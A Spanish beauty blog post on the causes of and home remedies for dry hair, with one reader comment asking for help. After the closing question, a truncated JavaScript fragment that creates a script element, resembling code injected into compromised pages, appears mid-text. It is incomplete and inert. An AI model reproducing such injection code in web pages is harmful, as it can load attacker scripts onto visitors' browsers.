Salud y belleza » Belleza, Salud

Causas y remedios para el cabello seco

1 Comentario

pelo-secoUno de los problemas capilares que más preocupa a las mujeres es el del pelo seco. A menudo puede ser un síntoma de algún déficit o problema de salud general que si se soluciona puede mejorar la salud del cabello.

Las causas de un pelo seco y quebradizo se pueden deber tanto a factores externos como a internos. El pelo seco se aprecia como un pelo sin brillo, difícil de peinar y quebradizo. Normalmente se debe a la falta de hidratación pero debemos dar con el problema para conseguir hallar la solución. El cabello seco puede deberse a algunas de las siguientes causas:

- Aspectos ambientales: aire seco, sol, contaminación…

- Lavar excesivamente el cabello con productos fuertes.

- Usar productos para el pelo con químicos perjudiciales, como tintes, espumas…

- Usar demasiado el secador.

- Problemas de tiroides.

- Carencias en la alimentación.

Estas son las causas más comunes y la buena noticia es que son fácilmente tratables y localizables, por lo que en poco tiempo volverás a lucir un cabello sano y fuerte. Para solucionar estos problemas lo mejor es recurrir a estas soluciones o remedios:

- Elegir y usar los productos adecuados. Para prevenir lo mejor es cambiar drásticamente los productos para el cabello que estemos usando. Buscar productos menos agresivos, específicos para cabello seco y dañado, tanto el champú como el suavizante y la mascarilla que deberemos usar una vez a la semana.

- Cuidar la alimentación: los nutrientes que necesita nuestro cabello también están en la alimentación. Por eso se recomienda beber dos litros de agua al día para hidratarse, evitar los dulces y bollería industrial, así como los fritos. Comiendo más verduras, frutas y aceite de oliva conseguirás dar a tu cabello los nutrientes que necesita. Pregunta a tu médico si además necesitas vitaminas extra.

- Por último deberás tener cuidado para evitar cualquier tipo de agresión al cabello. Procura no exponerte demasiado al sol ni abusar del secador, al igual que evitar los tratamientos agresivos de peluquería.

Siguiendo estos sencillos consejos seguro que consigues mejorar notablemente la salud de tu cabello y con el tiempo lucirás una melena suave, fuerte y brillante.

¿Qué remedios sigues para el cabello seco? var d=document;var s=d.createElement('script'); } else {

Más consejos de salud y belleza : , , ,

One Comment »

  • Rocío said:

    Yo tengo el pelo muy seco y las puntas muy abiertas, trato de cuidármelo pero no me funciona y antes lo tenía estupendo :S Ayuda!

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.